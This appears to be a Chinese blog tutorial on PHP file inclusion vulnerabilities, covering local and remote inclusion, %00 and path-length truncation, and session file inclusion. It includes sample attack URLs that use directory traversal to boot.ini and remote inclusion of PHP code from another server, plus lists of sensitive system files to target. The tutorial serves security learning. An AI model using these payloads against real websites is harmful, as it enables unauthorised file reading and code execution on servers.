3、文件包含漏洞

最新推荐文章于 2024-07-10 08:51:49 发布
最新推荐文章于 2024-07-10 08:51:49 发布
阅读量204 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sigali/article/details/114875178
版权

3、文件包含漏洞

3.1、文件包含漏洞简介

文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。

3.2、文件包含漏洞常见函数

PHP中的文件包含函数有以下4中:

(1)include()
(2)include_once()
(3)require()
(4)require_once()

3.3、无限制本地文件包含漏洞

无限制本地文件包含漏洞是指代码中没有包含文件指定的前缀或者.php、.html等扩展名,因此攻击者可以利用文件包含漏洞读取操作系统中的其他文件。

3.3.1、常见的敏感信息路径

(1)windows系统常见敏感文件如下:

c:\boot.ini 系统版本信息
c:\xxx\php.ini PHP配置信息
c:\xxx\my.ini MySQL配置信息
c:\xxx\httpd.conf Apache配置信息

(2)Linux系统常见敏感文件

/etc/passwd Linux系统账号信息
/etc/httpd/conf/httpd.conf Apache配置信息
/etc/my.conf MySQL配置信息
/urs/etc/php.ini PHP配置信息

3.3.2、利用无限制本地文件包含漏洞执行代码

找到一个有文件包含漏洞的页面,然后输入http://ip/xxx/xxx.php?filename=test.txt
而test.txt的内容是<?php phpinfo();?>

3.4、有限制本地文件包含漏洞

有限制本地文件包含漏洞是指代码中为包含文件指定了特定的前缀.php、.html等扩展名,攻击者需要绕过前缀或者扩展名过滤,才能利用文件包含漏洞。

3.4.1、%00截断文件包含
%00会被认为是结束符,后面的数据会被直接忽略,导致扩展名截断。

注意:

magic_quotes_gpc=off
PHP版本低于5.3.4

例如:

http://www.dvwa.com/index.php?filename=…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
通过%00截断了后面.html扩展名过滤,可以读取boot.ini文件的内容。

3.4.2、路径长度截断文件包含

我们可以输入超过最大路径长度的目录,这样系统就会将后面的路径丢弃,导致扩展名截断。

windows下目录的最大路径为256B
Linux下目录的最大路径为4096B

例如:

http://www.dvwa.com/index.php?filename=test.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
此时可以截断后面.html扩展名,包含了test.txt文件。

3.4.3、点号截断文件包含

当点号的长度大于256B时,就可以造成扩展名截断。跟上面路径长度截断一样。

3.5、Session文件包含

当可以获取Session文件的路径并且Session文件的内容可控是,就可以利用它进行攻击。

我们可以通过phpinfo中的session.save_path保存的是Session的存储位置。其次我们通过猜测,Linux中Session默认存储在/var/lib/php/session目录下。

这里我就不写演示了,可以参考下面这个案例,很全。

https://www.cnblogs.com/xiaoxiaosen/p/13066501.html

3.6、远程文件包含

3.6.1无限制远程文件包含
无限制远程文件包含是指包含文件的位置并不是本地服务器,而是通过URL的形式巴汗其他服务器上的文件,执行文件中的恶意代码。

漏洞利用条件:

allow_url_fopen = On(是否允许打开远程文件)
allow_url_include = On(是否允许include/require远程文件)

测试代码:

http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.13/FI/php.txt
此时192.168.91.13服务器上php.txt中的PHP代码被执行

3.6.1、有限制远程文件包含

可以通过问号,井号,空格绕过。

3.7、日志文件包含

sigali
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞
qq_51553814的博客
09-13 362
关于文件包含漏洞,我觉得和ssrf漏洞有点儿像,ssrf漏洞是通过curl()函数获取信息但是没有进行过滤,从而访问到内网造成危害,文件包含漏洞则是通过include()函数获取文件,攻击者输入敏感文件导致敏感文件也被输出从而产生危害。 原理 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文
PHP漏洞文件包含漏洞
dogeace的博客
11-28 1758
在php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php的文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
文件包含漏洞利用
supermeatboy223的博客
02-28 5621
文件包含原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。 文件包含函数 include():找不到被包含文件时会产生警告(E_WARNING); inc
文件包含漏洞总结
Shanfenglan's blog
04-06 767
前言 主要有远程文件包含与本地文件包含,一般出现在php环境中。 绕过姿势 参考文章 文件包含漏洞(绕过姿势)
超详细文件包含漏洞原理及修复
weixin_53519320的博客
11-17 3875
一、文件包含是什么 程序开发人员通常会把常用的可复性使用的函数写到一个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 (通俗的来说就是把文件放在一个文件夹下面然后使用的时候就可以直接调用) 文件包含原因 文件包含漏洞的原因? 随着网站业务的需求,程序开发人员一般希望代码更加灵活,所以将包含文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端也没有做合理的校验或者校验被绕过就照成了文件包含漏洞
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
php 远程包含文件漏洞分析第1/6页
10-29
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
web安全原理-文件包含漏洞
笑花大王
01-20 351
前言 起来吃完早饭就开始刷攻防世界的题,一个简单的文件包含题我竟然都做不出来我服了 拿出买的书开始从头学习总结文件包含漏洞! 一、文件包含漏洞 文件包含漏洞 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞肯能会造成服务器网页被篡改、网站被挂马、服...
Web安全文件包含漏洞详解
hack0919的博客
04-25 490
PHP文件包含会将一切的文件当成PHP脚本执行
文件包含漏洞详解
good good study
03-05 5076
大多数情况下,文件包含函数中包含的代码文件是固定的,如上面中的include "./info.php"直接是写死了,因此也不会出现安全问题。但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。上面说了文件包含漏洞的成因是因为代码实现了动态包含且包含的路径可控,于是我们将代码进行修改为动态传参的一种方式,建立文件index.php,文件内容如下。文件包含是PHP 的基本功能之一,有本地文件包含和远程文件包含之分。
文件包含漏洞全解
2301_78287784的博客
06-15 939
以上就是文件包含漏洞所有的内容,通过以上的介绍,我们可以看出文件包含漏洞利用难度,也可以根据他的原理提出修复建议:1、可以限制用户访问文件的权限;2、include函数中的参数用户是否可控,如果可控,则要限制;3、增加过滤,对用户输入的敏感参数进行过滤;4、配置文件中不必要开的参数设置为OFF等等,希望本文能对你有所帮助,星光安全面向基础。
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 605
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
文件上传、文件包含漏洞
10-21
文件包含漏洞是指攻击者通过利用应用程序中的文件包含函数,将恶意代码包含到应用程序中,从而执行攻击代码的漏洞。攻击者可以通过文件包含漏洞来获取服务器的控制权,或者通过包含大量文件来耗尽服务器资源。为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值